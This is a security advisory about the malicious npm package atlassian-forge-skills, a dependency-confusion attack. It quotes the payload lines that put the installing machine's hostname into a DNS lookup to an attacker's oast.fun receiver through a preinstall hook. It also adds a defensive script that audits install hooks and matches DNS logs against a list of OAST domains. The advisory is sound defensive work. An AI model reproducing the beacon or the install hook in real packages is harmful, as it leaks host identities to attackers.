Malicious package

atlassian-forge-skills (npm)

Malicious code in atlassian-forge-skills (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5891
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall atlassian-forge-skills

What this malware does

The package impersonates an internal Atlassian Forge dependency: the unscoped name atlassian-forge-skills, the description 'Internal package' and the generic author 'Team'. Its package.json declares "preinstall": "node index.js", which npm runs automatically during npm install. Lines 6-8 of index.js read os.hostname() and embed it as a subdomain of a hardcoded interactsh OAST receiver:

    const targetDomain = `${hostname}.zcagyqqmvnmgsklstrrr6xo2715tov7wz.oast.fun`;
    dns.lookup(targetDomain, () => {});

The DNS lookup alone is enough to leak the installing machine's hostname to the attacker-controlled oast.fun DNS server. This is the canonical dependency-confusion payload: any developer workstation or CI pipeline that mistakenly resolves an internal Atlassian package name to this public registry entry exposes its host identity for follow-on targeting.
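The two observable artefacts of this payload are an install-time lifecycle hook in package.json and a DNS query for a name under a public OAST receiver domain. The following is an added example, not code from the advisory or from the package it describes: one function audits a package.json string for hooks that npm runs unattended, the other scans constructed DNS query log lines for names under known OAST apex domains and splits off the leading label, which in this campaign is the leaked hostname. The log format, the sample package name, the receiver label placeholder, and the OAST domains other than oast.fun are assumptions made for the example.

```javascript
// Added example, not code from the advisory or the malicious package.
// Two defender-side checks for the mechanism described above:
//  1. flag npm lifecycle hooks that run code automatically on install
//  2. spot DNS queries to OAST receivers and recover the embedded label
// Sample inputs are constructed; only oast.fun is taken from the advisory.

// npm runs these hooks during `npm install` without prompting.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// OAST/callback-receiver apex domains to watch for in DNS logs.
// oast.fun is from the advisory; the others are assumed list entries.
const OAST_DOMAINS = [
  "oast.fun", "oast.pro", "oast.live", "oast.site", "oast.online", "oast.me", "interact.sh",
];

// Return one finding per install-time hook declared in a package.json string.
function auditLifecycleScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  return INSTALL_HOOKS
    .filter((hook) => Object.prototype.hasOwnProperty.call(scripts, hook))
    .map((hook) => ({
      name: pkg.name || "(unnamed)",
      version: pkg.version || "(unversioned)",
      hook,
      command: scripts[hook],
      // "node <file>.js" hands control to a file shipped in the tarball,
      // so the hook reveals nothing until that file is read.
      runsLocalFile: /\bnode\s+\S+\.js\b/.test(scripts[hook]),
    }));
}

// Given DNS query log lines "<timestamp> <client> <qname> <qtype>" (assumed
// format), return queries under an OAST domain with the leading label
// (the exfiltrated hostname in this campaign) split out.
function findOastBeacons(logLines) {
  const hits = [];
  for (const line of logLines) {
    const parts = line.trim().split(/\s+/);
    if (parts.length < 3) continue;
    const [ts, client, qnameRaw] = parts;
    const qname = qnameRaw.replace(/\.$/, "").toLowerCase();
    const apex = OAST_DOMAINS.find((d) => qname === d || qname.endsWith("." + d));
    if (!apex) continue;
    // Labels above the apex, e.g. ["build-agent-07", "<receiver id>"].
    const prefix = qname === apex ? "" : qname.slice(0, -(apex.length + 1));
    const labels = prefix.split(".").filter(Boolean);
    hits.push({
      ts,
      client,
      qname,
      apex,
      // A single label is just the receiver id; two or more means data
      // was prepended in front of it.
      leakedLabel: labels.length > 1 ? labels[0] : null,
    });
  }
  return hits;
}

// Constructed package.json mirroring the shape described in the advisory.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-internal-lib", // constructed name
  version: "0.0.1",
  description: "Internal package",
  scripts: { preinstall: "node index.js", test: "jest" },
});

// Constructed DNS log lines; the receiver id is an obvious placeholder.
const SAMPLE_DNS_LOG = [
  "2026-01-01T10:00:00Z 10.0.0.5 registry.npmjs.org. A",
  "2026-01-01T10:00:01Z 10.0.0.5 build-agent-07.RECEIVER-ID-PLACEHOLDER.oast.fun. A",
  "2026-01-01T10:00:02Z 10.0.0.9 www.example.com. AAAA",
];

console.log(auditLifecycleScripts(SAMPLE_PACKAGE_JSON));
console.log(findOastBeacons(SAMPLE_DNS_LOG));
```

The first check is cheap enough to run over every package.json in node_modules before a build is trusted; a preinstall hook on a package that claims to be an internal library is the signal this advisory hinges on. For the second, a query whose leading label equals one of your own hostnames names the affected machine directly. npm's ignore-scripts setting, which disables lifecycle hooks at install time, removes the automatic execution path this package depends on.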

Malicious versions

1 flagged
29.1.0

Indicators of compromise (SHA-256)

0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c

Frequently asked questions

Is atlassian-forge-skills safe to use?

No. atlassian-forge-skills on npm has been identified as a malicious package (version 29.1.0 flagged). It should be removed immediately; do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006753

Credits

  • Amazon Inspector · finder

atlassian-forge-skills (npm) malicious package — MAL-2026-5891 | O3 Security